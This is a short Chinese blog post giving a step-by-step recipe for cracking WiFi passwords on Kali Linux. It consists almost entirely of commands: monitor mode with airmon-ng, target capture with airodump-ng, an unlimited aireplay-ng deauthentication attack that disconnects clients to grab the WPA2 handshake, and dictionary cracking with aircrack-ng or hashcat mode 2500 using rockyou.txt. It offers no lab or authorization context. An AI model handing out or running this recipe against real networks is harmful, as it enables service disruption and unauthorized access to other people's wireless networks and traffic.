在kali下利用aircrack和hashcat暴力破解wifi密码

airmon-ng start wlan0   使网卡开始监听

airodump-ng wlan0mon   扫描附近无线网络情况

airodump-ng –bssid 00:00:00:00:00:00 -c 6 -w testap wlan0mon 

对某个AP进行监听

参数解释:

–bssid AP的MAC地址

-c 频道数

-w 抓包所存储的文件名

aireplay-ng -0 0 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon

对客户端进行deauth攻击,使其断线重连,抓取握手包

参数解释:

-0 攻击模式,0为无限次

-a AP的MAC地址

-c 客户端的MAC地址

aircrack-ng -w password.txt a.cap

跑字典

也可以用hashcat

https://hashcat.net/cap2hccapx/

去官网把cap转为hccapx

hashcat -m 2500 1.hccapx pass.txt

参数解释:

-m 解密模式,2500为WPA2

kali自带一个rockyou.txt,也可以自己写程序生成更大的字典

发表评论

电子邮件地址不会被公开。 必填项已用*标注